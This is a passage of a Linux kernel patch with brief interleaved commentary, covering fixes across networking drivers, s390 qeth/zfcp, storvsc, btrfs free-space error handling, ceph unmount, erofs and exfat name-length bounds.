+ 		dev_err(&ipa->pdev->dev,
+ 			"no transaction for %s route reset\n",
+@@ -350,12 +350,14 @@ static int ipa_route_reset(struct ipa *ipa, bool modem)
+ 	}
+ 
+ 	ipa_table_reset_add(trans, false, first, count, IPA_MEM_V4_ROUTE);
+-	ipa_table_reset_add(trans, false, first, count,
+-			    IPA_MEM_V4_ROUTE_HASHED);
+-
+ 	ipa_table_reset_add(trans, false, first, count, IPA_MEM_V6_ROUTE);
+-	ipa_table_reset_add(trans, false, first, count,
+-			    IPA_MEM_V6_ROUTE_HASHED);
++
++	if (hash_support) {
++		ipa_table_reset_add(trans, false, first, count,
++				    IPA_MEM_V4_ROUTE_HASHED);
++		ipa_table_reset_add(trans, false, first, count,
++				    IPA_MEM_V6_ROUTE_HASHED);
++	}
+ 
+ 	gsi_trans_commit_wait(trans);
+ 
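
The route-reset hunk sizes the GSI command transaction to match exactly
what will be queued: two table resets always, plus the two hashed resets
only when the hardware supports hashed tables. Condensed (a sketch of the
logic above, not new driver code):

	trans = ipa_cmd_trans_alloc(ipa, hash_support ? 4 : 2);
	ipa_table_reset_add(trans, false, first, count, IPA_MEM_V4_ROUTE);
	ipa_table_reset_add(trans, false, first, count, IPA_MEM_V6_ROUTE);
	if (hash_support) {
		ipa_table_reset_add(trans, false, first, count,
				    IPA_MEM_V4_ROUTE_HASHED);
		ipa_table_reset_add(trans, false, first, count,
				    IPA_MEM_V6_ROUTE_HASHED);
	}
	gsi_trans_commit_wait(trans);

Requesting only the slots that are actually filled presumably avoids
reserving transaction elements for commands that are never added.
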
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index 3c468ef8f245f..8c010857e6d70 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -533,7 +533,7 @@ static int tap_open(struct inode *inode, struct file *file)
+ 	q->sock.state = SS_CONNECTED;
+ 	q->sock.file = file;
+ 	q->sock.ops = &tap_socket_ops;
+-	sock_init_data_uid(&q->sock, &q->sk, inode->i_uid);
++	sock_init_data_uid(&q->sock, &q->sk, current_fsuid());
+ 	q->sk.sk_write_space = tap_sock_write_space;
+ 	q->sk.sk_destruct = tap_sock_destruct;
+ 	q->flags = IFF_VNET_HDR | IFF_NO_PI | IFF_TAP;
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 7c8db8f6f661e..228f5f9ef1dde 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -3457,7 +3457,7 @@ static int tun_chr_open(struct inode *inode, struct file * file)
+ 	tfile->socket.file = file;
+ 	tfile->socket.ops = &tun_socket_ops;
+ 
+-	sock_init_data_uid(&tfile->socket, &tfile->sk, inode->i_uid);
++	sock_init_data_uid(&tfile->socket, &tfile->sk, current_fsuid());
+ 
+ 	tfile->sk.sk_write_space = tun_sock_write_space;
+ 	tfile->sk.sk_sndbuf = INT_MAX;
+diff --git a/drivers/net/usb/cdc_ether.c b/drivers/net/usb/cdc_ether.c
+index fb5f59d0d55d7..f07bfe56ec875 100644
+--- a/drivers/net/usb/cdc_ether.c
++++ b/drivers/net/usb/cdc_ether.c
+@@ -618,9 +618,23 @@ static const struct usb_device_id	products[] = {
+ 	.match_flags	=   USB_DEVICE_ID_MATCH_INT_INFO
+ 			  | USB_DEVICE_ID_MATCH_DEVICE,
+ 	.idVendor		= 0x04DD,
++	.idProduct		= 0x8005,   /* A-300 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info        = 0,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
+ 	.idProduct		= 0x8006,	/* B-500/SL-5600 */
+ 	ZAURUS_MASTER_INTERFACE,
+ 	.driver_info		= 0,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
++	.idProduct		= 0x8006,   /* B-500/SL-5600 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info        = 0,
+ }, {
+ 	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
+ 			  | USB_DEVICE_ID_MATCH_DEVICE,
+@@ -628,6 +642,13 @@ static const struct usb_device_id	products[] = {
+ 	.idProduct		= 0x8007,	/* C-700 */
+ 	ZAURUS_MASTER_INTERFACE,
+ 	.driver_info		= 0,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
++	.idProduct		= 0x8007,   /* C-700 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info        = 0,
+ }, {
+ 	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
+ 		 | USB_DEVICE_ID_MATCH_DEVICE,
+diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
+index 64a9a80b23094..405e588f8a3a5 100644
+--- a/drivers/net/usb/usbnet.c
++++ b/drivers/net/usb/usbnet.c
+@@ -1770,6 +1770,10 @@ usbnet_probe (struct usb_interface *udev, const struct usb_device_id *prod)
+ 	} else if (!info->in || !info->out)
+ 		status = usbnet_get_endpoints (dev, udev);
+ 	else {
++		u8 ep_addrs[3] = {
++			info->in + USB_DIR_IN, info->out + USB_DIR_OUT, 0
++		};
++
+ 		dev->in = usb_rcvbulkpipe (xdev, info->in);
+ 		dev->out = usb_sndbulkpipe (xdev, info->out);
+ 		if (!(info->flags & FLAG_NO_SETINT))
+@@ -1779,6 +1783,8 @@ usbnet_probe (struct usb_interface *udev, const struct usb_device_id *prod)
+ 		else
+ 			status = 0;
+ 
++		if (status == 0 && !usb_check_bulk_endpoints(udev, ep_addrs))
++			status = -EINVAL;
+ 	}
+ 	if (status >= 0 && dev->status)
+ 		status = init_status (dev, udev);
+diff --git a/drivers/net/usb/zaurus.c b/drivers/net/usb/zaurus.c
+index 7984f2157d222..df3617c4c44e8 100644
+--- a/drivers/net/usb/zaurus.c
++++ b/drivers/net/usb/zaurus.c
+@@ -289,9 +289,23 @@ static const struct usb_device_id	products [] = {
+ 	.match_flags	=   USB_DEVICE_ID_MATCH_INT_INFO
+ 			  | USB_DEVICE_ID_MATCH_DEVICE,
+ 	.idVendor		= 0x04DD,
++	.idProduct		= 0x8005,	/* A-300 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info = (unsigned long)&bogus_mdlm_info,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
+ 	.idProduct		= 0x8006,	/* B-500/SL-5600 */
+ 	ZAURUS_MASTER_INTERFACE,
+ 	.driver_info = ZAURUS_PXA_INFO,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
++	.idProduct		= 0x8006,	/* B-500/SL-5600 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info = (unsigned long)&bogus_mdlm_info,
+ }, {
+ 	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
+ 	          | USB_DEVICE_ID_MATCH_DEVICE,
+@@ -299,6 +313,13 @@ static const struct usb_device_id	products [] = {
+ 	.idProduct		= 0x8007,	/* C-700 */
+ 	ZAURUS_MASTER_INTERFACE,
+ 	.driver_info = ZAURUS_PXA_INFO,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
++	.idProduct		= 0x8007,	/* C-700 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info = (unsigned long)&bogus_mdlm_info,
+ }, {
+ 	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
+ 		 | USB_DEVICE_ID_MATCH_DEVICE,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7615/eeprom.c
+index 6dbaaf95ee385..2092aa373ab32 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/eeprom.c
+@@ -123,12 +123,12 @@ mt7615_eeprom_parse_hw_band_cap(struct mt7615_dev *dev)
+ 	case MT_EE_5GHZ:
+ 		dev->mphy.cap.has_5ghz = true;
+ 		break;
+-	case MT_EE_2GHZ:
+-		dev->mphy.cap.has_2ghz = true;
+-		break;
+ 	case MT_EE_DBDC:
+ 		dev->dbdc_support = true;
+ 		fallthrough;
++	case MT_EE_2GHZ:
++		dev->mphy.cap.has_2ghz = true;
++		break;
+ 	default:
+ 		dev->mphy.cap.has_2ghz = true;
+ 		dev->mphy.cap.has_5ghz = true;
+diff --git a/drivers/s390/net/qeth_core.h b/drivers/s390/net/qeth_core.h
+index 1d195429753dd..613eab7297046 100644
+--- a/drivers/s390/net/qeth_core.h
++++ b/drivers/s390/net/qeth_core.h
+@@ -716,7 +716,6 @@ struct qeth_card_info {
+ 	u16 chid;
+ 	u8 ids_valid:1; /* cssid,iid,chid */
+ 	u8 dev_addr_is_registered:1;
+-	u8 open_when_online:1;
+ 	u8 promisc_mode:1;
+ 	u8 use_v1_blkt:1;
+ 	u8 is_vm_nic:1;
+diff --git a/drivers/s390/net/qeth_core_main.c b/drivers/s390/net/qeth_core_main.c
+index 8bd9fd51208c9..ae4b6d24bc902 100644
+--- a/drivers/s390/net/qeth_core_main.c
++++ b/drivers/s390/net/qeth_core_main.c
+@@ -5371,8 +5371,6 @@ int qeth_set_offline(struct qeth_card *card, const struct qeth_discipline *disc,
+ 	qeth_clear_ipacmd_list(card);
+ 
+ 	rtnl_lock();
+-	card->info.open_when_online = card->dev->flags & IFF_UP;
+-	dev_close(card->dev);
+ 	netif_device_detach(card->dev);
+ 	netif_carrier_off(card->dev);
+ 	rtnl_unlock();
+diff --git a/drivers/s390/net/qeth_l2_main.c b/drivers/s390/net/qeth_l2_main.c
+index c6ded3fdd715c..9ef2118fc7a2a 100644
+--- a/drivers/s390/net/qeth_l2_main.c
++++ b/drivers/s390/net/qeth_l2_main.c
+@@ -2387,9 +2387,12 @@ static int qeth_l2_set_online(struct qeth_card *card, bool carrier_ok)
+ 		qeth_enable_hw_features(dev);
+ 		qeth_l2_enable_brport_features(card);
+ 
+-		if (card->info.open_when_online) {
+-			card->info.open_when_online = 0;
+-			dev_open(dev, NULL);
++		if (netif_running(dev)) {
++			local_bh_disable();
++			napi_schedule(&card->napi);
++			/* kick-start the NAPI softirq: */
++			local_bh_enable();
++			qeth_l2_set_rx_mode(dev);
+ 		}
+ 		rtnl_unlock();
+ 	}
+diff --git a/drivers/s390/net/qeth_l3_main.c b/drivers/s390/net/qeth_l3_main.c
+index d8487a10cd555..c0f30cefec102 100644
+--- a/drivers/s390/net/qeth_l3_main.c
++++ b/drivers/s390/net/qeth_l3_main.c
+@@ -2017,9 +2017,11 @@ static int qeth_l3_set_online(struct qeth_card *card, bool carrier_ok)
+ 		netif_device_attach(dev);
+ 		qeth_enable_hw_features(dev);
+ 
+-		if (card->info.open_when_online) {
+-			card->info.open_when_online = 0;
+-			dev_open(dev, NULL);
++		if (netif_running(dev)) {
++			local_bh_disable();
++			napi_schedule(&card->napi);
++			/* kick-start the NAPI softirq: */
++			local_bh_enable();
+ 		}
+ 		rtnl_unlock();
+ 	}
+diff --git a/drivers/s390/scsi/zfcp_fc.c b/drivers/s390/scsi/zfcp_fc.c
+index 77917b3398709..a64def01d8249 100644
+--- a/drivers/s390/scsi/zfcp_fc.c
++++ b/drivers/s390/scsi/zfcp_fc.c
+@@ -534,8 +534,7 @@ static void zfcp_fc_adisc_handler(void *data)
+ 
+ 	/* re-init to undo drop from zfcp_fc_adisc() */
+ 	port->d_id = ntoh24(adisc_resp->adisc_port_id);
+-	/* port is good, unblock rport without going through erp */
+-	zfcp_scsi_schedule_rport_register(port);
++	/* port is still good, nothing to do */
+  out:
+ 	atomic_andnot(ZFCP_STATUS_PORT_LINK_TEST, &port->status);
+ 	put_device(&port->dev);
+@@ -595,9 +594,6 @@ void zfcp_fc_link_test_work(struct work_struct *work)
+ 	int retval;
+ 
+ 	set_worker_desc("zadisc%16llx", port->wwpn); /* < WORKER_DESC_LEN=24 */
+-	get_device(&port->dev);
+-	port->rport_task = RPORT_DEL;
+-	zfcp_scsi_rport_work(&port->rport_work);
+ 
+ 	/* only issue one test command at one time per port */
+ 	if (atomic_read(&port->status) & ZFCP_STATUS_PORT_LINK_TEST)
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 5284f9a0b826e..54a1b8514f04b 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -365,6 +365,7 @@ static void storvsc_on_channel_callback(void *context);
+ #define STORVSC_FC_MAX_LUNS_PER_TARGET			255
+ #define STORVSC_FC_MAX_TARGETS				128
+ #define STORVSC_FC_MAX_CHANNELS				8
++#define STORVSC_FC_MAX_XFER_SIZE			((u32)(512 * 1024))
+ 
+ #define STORVSC_IDE_MAX_LUNS_PER_TARGET			64
+ #define STORVSC_IDE_MAX_TARGETS				1
+@@ -2002,6 +2003,9 @@ static int storvsc_probe(struct hv_device *device,
+ 	 * protecting it from any weird value.
+ 	 */
+ 	max_xfer_bytes = round_down(stor_device->max_transfer_bytes, HV_HYP_PAGE_SIZE);
++	if (is_fc)
++		max_xfer_bytes = min(max_xfer_bytes, STORVSC_FC_MAX_XFER_SIZE);
++
+ 	/* max_hw_sectors_kb */
+ 	host->max_sectors = max_xfer_bytes >> 9;
+ 	/*
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index d93e8735ab1f9..d7aad5e8ee377 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -494,12 +494,16 @@ static void fragment_free_space(struct btrfs_block_group *block_group)
+  * used yet since their free space will be released as soon as the transaction
+  * commits.
+  */
+-u64 add_new_free_space(struct btrfs_block_group *block_group, u64 start, u64 end)
++int add_new_free_space(struct btrfs_block_group *block_group, u64 start, u64 end,
++		       u64 *total_added_ret)
+ {
+ 	struct btrfs_fs_info *info = block_group->fs_info;
+-	u64 extent_start, extent_end, size, total_added = 0;
++	u64 extent_start, extent_end, size;
+ 	int ret;
+ 
++	if (total_added_ret)
++		*total_added_ret = 0;
++
+ 	while (start < end) {
+ 		ret = find_first_extent_bit(&info->excluded_extents, start,
+ 					    &extent_start, &extent_end,
+@@ -512,10 +516,12 @@ u64 add_new_free_space(struct btrfs_block_group *block_group, u64 start, u64 end
+ 			start = extent_end + 1;
+ 		} else if (extent_start > start && extent_start < end) {
+ 			size = extent_start - start;
+-			total_added += size;
+ 			ret = btrfs_add_free_space_async_trimmed(block_group,
+ 								 start, size);
+-			BUG_ON(ret); /* -ENOMEM or logic error */
++			if (ret)
++				return ret;
++			if (total_added_ret)
++				*total_added_ret += size;
+ 			start = extent_end + 1;
+ 		} else {
+ 			break;
+@@ -524,13 +530,15 @@ u64 add_new_free_space(struct btrfs_block_group *block_group, u64 start, u64 end
+ 
+ 	if (start < end) {
+ 		size = end - start;
+-		total_added += size;
+ 		ret = btrfs_add_free_space_async_trimmed(block_group, start,
+ 							 size);
+-		BUG_ON(ret); /* -ENOMEM or logic error */
++		if (ret)
++			return ret;
++		if (total_added_ret)
++			*total_added_ret += size;
+ 	}
+ 
+-	return total_added;
++	return 0;
+ }
+ 
+ static int load_extent_tree_free(struct btrfs_caching_control *caching_ctl)
+@@ -637,8 +645,13 @@ next:
+ 
+ 		if (key.type == BTRFS_EXTENT_ITEM_KEY ||
+ 		    key.type == BTRFS_METADATA_ITEM_KEY) {
+-			total_found += add_new_free_space(block_group, last,
+-							  key.objectid);
++			u64 space_added;
++
++			ret = add_new_free_space(block_group, last, key.objectid,
++						 &space_added);
++			if (ret)
++				goto out;
++			total_found += space_added;
+ 			if (key.type == BTRFS_METADATA_ITEM_KEY)
+ 				last = key.objectid +
+ 					fs_info->nodesize;
+@@ -653,11 +666,10 @@ next:
+ 		}
+ 		path->slots[0]++;
+ 	}
+-	ret = 0;
+-
+-	total_found += add_new_free_space(block_group, last,
+-				block_group->start + block_group->length);
+ 
++	ret = add_new_free_space(block_group, last,
++				 block_group->start + block_group->length,
++				 NULL);
+ out:
+ 	btrfs_free_path(path);
+ 	return ret;
+@@ -2101,9 +2113,11 @@ static int read_one_block_group(struct btrfs_fs_info *info,
+ 		btrfs_free_excluded_extents(cache);
+ 	} else if (cache->used == 0) {
+ 		cache->cached = BTRFS_CACHE_FINISHED;
+-		add_new_free_space(cache, cache->start,
+-				   cache->start + cache->length);
++		ret = add_new_free_space(cache, cache->start,
++					 cache->start + cache->length, NULL);
+ 		btrfs_free_excluded_extents(cache);
++		if (ret)
++			goto error;
+ 	}
+ 
+ 	ret = btrfs_add_block_group_cache(info, cache);
+@@ -2529,9 +2543,12 @@ struct btrfs_block_group *btrfs_make_block_group(struct btrfs_trans_handle *tran
+ 		return ERR_PTR(ret);
+ 	}
+ 
+-	add_new_free_space(cache, chunk_offset, chunk_offset + size);
+-
++	ret = add_new_free_space(cache, chunk_offset, chunk_offset + size, NULL);
+ 	btrfs_free_excluded_extents(cache);
++	if (ret) {
++		btrfs_put_block_group(cache);
++		return ERR_PTR(ret);
++	}
+ 
+ 	/*
+ 	 * Ensure the corresponding space_info object is created and
+diff --git a/fs/btrfs/block-group.h b/fs/btrfs/block-group.h
+index 8fb14b99a1d1f..0a3d386823583 100644
+--- a/fs/btrfs/block-group.h
++++ b/fs/btrfs/block-group.h
+@@ -284,8 +284,8 @@ int btrfs_cache_block_group(struct btrfs_block_group *cache, bool wait);
+ void btrfs_put_caching_control(struct btrfs_caching_control *ctl);
+ struct btrfs_caching_control *btrfs_get_caching_control(
+ 		struct btrfs_block_group *cache);
+-u64 add_new_free_space(struct btrfs_block_group *block_group,
+-		       u64 start, u64 end);
++int add_new_free_space(struct btrfs_block_group *block_group,
++		       u64 start, u64 end, u64 *total_added_ret);
+ struct btrfs_trans_handle *btrfs_start_trans_remove_block_group(
+ 				struct btrfs_fs_info *fs_info,
+ 				const u64 chunk_offset);
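
The prototype change above carries the whole refactoring: add_new_free_space()
now returns an error code instead of hitting BUG_ON() on failure, and the
bytes-added count moves to an optional out parameter that callers may pass as
NULL. A generic sketch of the error-code-plus-out-parameter pattern;
accumulate_range() and its values are hypothetical:

    #include <stdio.h>

    /* Hypothetical stand-in for the reworked interface: the error travels
     * via the return value, the result via a nullable out pointer. */
    static int accumulate_range(long start, long end, long *total_ret)
    {
            if (total_ret)
                    *total_ret = 0;     /* initialize, as the btrfs version does */
            if (start > end)
                    return -22;         /* -EINVAL-style failure, no BUG_ON() */
            if (total_ret)
                    *total_ret = end - start;
            return 0;
    }

    int main(void)
    {
            long total;

            if (accumulate_range(10, 25, &total) == 0)
                    printf("added %ld\n", total);
            /* callers that only care about success pass NULL, as several
             * add_new_free_space() call sites above now do */
            accumulate_range(10, 25, NULL);
            return 0;
    }
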
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index a07450f64abb1..a207db9322264 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -1510,9 +1510,13 @@ static int load_free_space_bitmaps(struct btrfs_caching_control *caching_ctl,
+ 			if (prev_bit == 0 && bit == 1) {
+ 				extent_start = offset;
+ 			} else if (prev_bit == 1 && bit == 0) {
+-				total_found += add_new_free_space(block_group,
+-								  extent_start,
+-								  offset);
++				u64 space_added;
++
++				ret = add_new_free_space(block_group, extent_start,
++							 offset, &space_added);
++				if (ret)
++					goto out;
++				total_found += space_added;
+ 				if (total_found > CACHING_CTL_WAKE_UP) {
+ 					total_found = 0;
+ 					wake_up(&caching_ctl->wait);
+@@ -1524,8 +1528,9 @@ static int load_free_space_bitmaps(struct btrfs_caching_control *caching_ctl,
+ 		}
+ 	}
+ 	if (prev_bit == 1) {
+-		total_found += add_new_free_space(block_group, extent_start,
+-						  end);
++		ret = add_new_free_space(block_group, extent_start, end, NULL);
++		if (ret)
++			goto out;
+ 		extent_count++;
+ 	}
+ 
+@@ -1564,6 +1569,8 @@ static int load_free_space_extents(struct btrfs_caching_control *caching_ctl,
+ 	end = block_group->start + block_group->length;
+ 
+ 	while (1) {
++		u64 space_added;
++
+ 		ret = btrfs_next_item(root, path);
+ 		if (ret < 0)
+ 			goto out;
+@@ -1578,8 +1585,11 @@ static int load_free_space_extents(struct btrfs_caching_control *caching_ctl,
+ 		ASSERT(key.type == BTRFS_FREE_SPACE_EXTENT_KEY);
+ 		ASSERT(key.objectid < end && key.objectid + key.offset <= end);
+ 
+-		total_found += add_new_free_space(block_group, key.objectid,
+-						  key.objectid + key.offset);
++		ret = add_new_free_space(block_group, key.objectid,
++					 key.objectid + key.offset, &space_added);
++		if (ret)
++			goto out;
++		total_found += space_added;
+ 		if (total_found > CACHING_CTL_WAKE_UP) {
+ 			total_found = 0;
+ 			wake_up(&caching_ctl->wait);
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 1989c8deea55a..dcabe2783edfe 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -4758,7 +4758,7 @@ static void delayed_work(struct work_struct *work)
+ 
+ 	dout("mdsc delayed_work\n");
+ 
+-	if (mdsc->stopping)
++	if (mdsc->stopping >= CEPH_MDSC_STOPPING_FLUSHED)
+ 		return;
+ 
+ 	mutex_lock(&mdsc->mutex);
+@@ -4937,7 +4937,7 @@ void send_flush_mdlog(struct ceph_mds_session *s)
+ void ceph_mdsc_pre_umount(struct ceph_mds_client *mdsc)
+ {
+ 	dout("pre_umount\n");
+-	mdsc->stopping = 1;
++	mdsc->stopping = CEPH_MDSC_STOPPING_BEGIN;
+ 
+ 	ceph_mdsc_iterate_sessions(mdsc, send_flush_mdlog, true);
+ 	ceph_mdsc_iterate_sessions(mdsc, lock_unlock_session, false);
+diff --git a/fs/ceph/mds_client.h b/fs/ceph/mds_client.h
+index 18b026b1ac63f..9a80658f41679 100644
+--- a/fs/ceph/mds_client.h
++++ b/fs/ceph/mds_client.h
+@@ -380,6 +380,11 @@ struct cap_wait {
+ 	int			want;
+ };
+ 
++enum {
++       CEPH_MDSC_STOPPING_BEGIN = 1,
++       CEPH_MDSC_STOPPING_FLUSHED = 2,
++};
++
+ /*
+  * mds client state
+  */
+diff --git a/fs/ceph/super.c b/fs/ceph/super.c
+index 3fc48b43cab0a..a5f52013314d6 100644
+--- a/fs/ceph/super.c
++++ b/fs/ceph/super.c
+@@ -1374,6 +1374,16 @@ static void ceph_kill_sb(struct super_block *s)
+ 	ceph_mdsc_pre_umount(fsc->mdsc);
+ 	flush_fs_workqueues(fsc);
+ 
++	/*
++	 * Though kill_anon_super() will eventually trigger
++	 * sync_filesystem() anyway, we still need to do it here
++	 * and then bump the shutdown stage to stop the work
++	 * queue as early as possible.
++	 */
++	sync_filesystem(s);
++
++	fsc->mdsc->stopping = CEPH_MDSC_STOPPING_FLUSHED;
++
+ 	kill_anon_super(s);
+ 
+ 	fsc->client->extra_mon_dispatch = NULL;
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 533e612b6a486..361f3c29897e8 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -989,10 +989,11 @@ static void z_erofs_do_decompressed_bvec(struct z_erofs_decompress_backend *be,
+ 					 struct z_erofs_bvec *bvec)
+ {
+ 	struct z_erofs_bvec_item *item;
++	unsigned int pgnr;
+ 
+-	if (!((bvec->offset + be->pcl->pageofs_out) & ~PAGE_MASK)) {
+-		unsigned int pgnr;
+-
++	if (!((bvec->offset + be->pcl->pageofs_out) & ~PAGE_MASK) &&
++	    (bvec->end == PAGE_SIZE ||
++	     bvec->offset + bvec->end == be->pcl->length)) {
+ 		pgnr = (bvec->offset + be->pcl->pageofs_out) >> PAGE_SHIFT;
+ 		DBG_BUGON(pgnr >= be->nr_pages);
+ 		if (!be->decompressed_pages[pgnr]) {
+diff --git a/fs/exfat/balloc.c b/fs/exfat/balloc.c
+index 9f42f25fab920..e918decb37358 100644
+--- a/fs/exfat/balloc.c
++++ b/fs/exfat/balloc.c
+@@ -69,7 +69,7 @@ static int exfat_allocate_bitmap(struct super_block *sb,
+ 	}
+ 	sbi->map_sectors = ((need_map_size - 1) >>
+ 			(sb->s_blocksize_bits)) + 1;
+-	sbi->vol_amap = kmalloc_array(sbi->map_sectors,
++	sbi->vol_amap = kvmalloc_array(sbi->map_sectors,
+ 				sizeof(struct buffer_head *), GFP_KERNEL);
+ 	if (!sbi->vol_amap)
+ 		return -ENOMEM;
+@@ -84,7 +84,7 @@ static int exfat_allocate_bitmap(struct super_block *sb,
+ 			while (j < i)
+ 				brelse(sbi->vol_amap[j++]);
+ 
+-			kfree(sbi->vol_amap);
++			kvfree(sbi->vol_amap);
+ 			sbi->vol_amap = NULL;
+ 			return -EIO;
+ 		}
+@@ -138,7 +138,7 @@ void exfat_free_bitmap(struct exfat_sb_info *sbi)
+ 	for (i = 0; i < sbi->map_sectors; i++)
+ 		__brelse(sbi->vol_amap[i]);
+ 
+-	kfree(sbi->vol_amap);
++	kvfree(sbi->vol_amap);
+ }
+ 
+ int exfat_set_bitmap(struct inode *inode, unsigned int clu, bool sync)
+diff --git a/fs/exfat/dir.c b/fs/exfat/dir.c
+index 15c4f901be369..51b03b0dd5f75 100644
+--- a/fs/exfat/dir.c
++++ b/fs/exfat/dir.c
+@@ -34,6 +34,7 @@ static void exfat_get_uniname_from_ext_entry(struct super_block *sb,
+ {
+ 	int i;
+ 	struct exfat_entry_set_cache *es;
++	unsigned int uni_len = 0, len;
+ 
+ 	es = exfat_get_dentry_set(sb, p_dir, entry, ES_ALL_ENTRIES);
+ 	if (!es)
+@@ -52,7 +53,10 @@ static void exfat_get_uniname_from_ext_entry(struct super_block *sb,
+ 		if (exfat_get_entry_type(ep) != TYPE_EXTEND)
+ 			break;
+ 
+-		exfat_extract_uni_name(ep, uniname);
++		len = exfat_extract_uni_name(ep, uniname);
++		uni_len += len;
++		if (len != EXFAT_FILE_NAME_LEN || uni_len >= MAX_NAME_LENGTH)
++			break;
+ 		uniname += EXFAT_FILE_NAME_LEN;
+ 	}
+ 
+@@ -210,7 +214,10 @@ static void exfat_free_namebuf(struct exfat_dentry_namebuf *nb)
+ 	exfat_init_namebuf(nb);
+ }
+ 
+-/* skip iterating emit_dots when dir is empty */
++/*
++ * Before calling dir_emit*(), sbi->s_lock should be released
++ * because page fault can occur in dir_emit*().
++ */
+ #define ITER_POS_FILLED_DOTS    (2)
+ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ {
+@@ -225,11 +232,10 @@ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ 	int err = 0, fake_offset = 0;
+ 
+ 	exfat_init_namebuf(nb);
+-	mutex_lock(&EXFAT_SB(sb)->s_lock);
+ 
+ 	cpos = ctx->pos;
+ 	if (!dir_emit_dots(file, ctx))
+-		goto unlock;
++		goto out;
+ 
+ 	if (ctx->pos == ITER_POS_FILLED_DOTS) {
+ 		cpos = 0;
+@@ -241,16 +247,18 @@ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ 	/* name buffer should be allocated before use */
+ 	err = exfat_alloc_namebuf(nb);
+ 	if (err)
+-		goto unlock;
++		goto out;
+ get_new:
++	mutex_lock(&EXFAT_SB(sb)->s_lock);
++
+ 	if (ei->flags == ALLOC_NO_FAT_CHAIN && cpos >= i_size_read(inode))
+ 		goto end_of_dir;
+ 
+ 	err = exfat_readdir(inode, &cpos, &de);
+ 	if (err) {
+ 		/*
+-		 * At least we tried to read a sector.  Move cpos to next sector
+-		 * position (should be aligned).
++		 * At least we tried to read a sector.
++		 * Move cpos to next sector position (should be aligned).
+ 		 */
+ 		if (err == -EIO) {
+ 			cpos += 1 << (sb->s_blocksize_bits);
+@@ -273,16 +281,10 @@ get_new:
+ 		inum = iunique(sb, EXFAT_ROOT_INO);
+ 	}
+ 
+-	/*
+-	 * Before calling dir_emit(), sb_lock should be released.
+-	 * Because page fault can occur in dir_emit() when the size
+-	 * of buffer given from user is larger than one page size.
+-	 */
+ 	mutex_unlock(&EXFAT_SB(sb)->s_lock);
+ 	if (!dir_emit(ctx, nb->lfn, strlen(nb->lfn), inum,
+ 			(de.attr & ATTR_SUBDIR) ? DT_DIR : DT_REG))
+-		goto out_unlocked;
+-	mutex_lock(&EXFAT_SB(sb)->s_lock);
++		goto out;
+ 	ctx->pos = cpos;
+ 	goto get_new;
+ 
+@@ -290,9 +292,8 @@ end_of_dir:
+ 	if (!cpos && fake_offset)
+ 		cpos = ITER_POS_FILLED_DOTS;
+ 	ctx->pos = cpos;
+-unlock:
+ 	mutex_unlock(&EXFAT_SB(sb)->s_lock);
+-out_unlocked:
++out:
+ 	/*
+ 	 * To improve performance, free namebuf after unlocking sb_lock.
+ 	 * If namebuf is not allocated, this function does nothing.
+@@ -1027,7 +1028,8 @@ rewind:
+ 			if (entry_type == TYPE_EXTEND) {
+ 				unsigned short entry_uniname[16], unichar;
+ 
+-				if (step != DIRENT_STEP_NAME) {
++				if (step != DIRENT_STEP_NAME ||
++				    name_len >= MAX_NAME_LENGTH) {
+ 					step = DIRENT_STEP_FILE;
+ 					continue;
+ 				}
+diff --git a/fs/ext2/ext2.h b/fs/ext2/ext2.h
+index dc5dcb78bc27f..2c95916aead88 100644
+--- a/fs/ext2/ext2.h
++++ b/fs/ext2/ext2.h
+@@ -70,10 +70,7 @@ struct mb_cache;
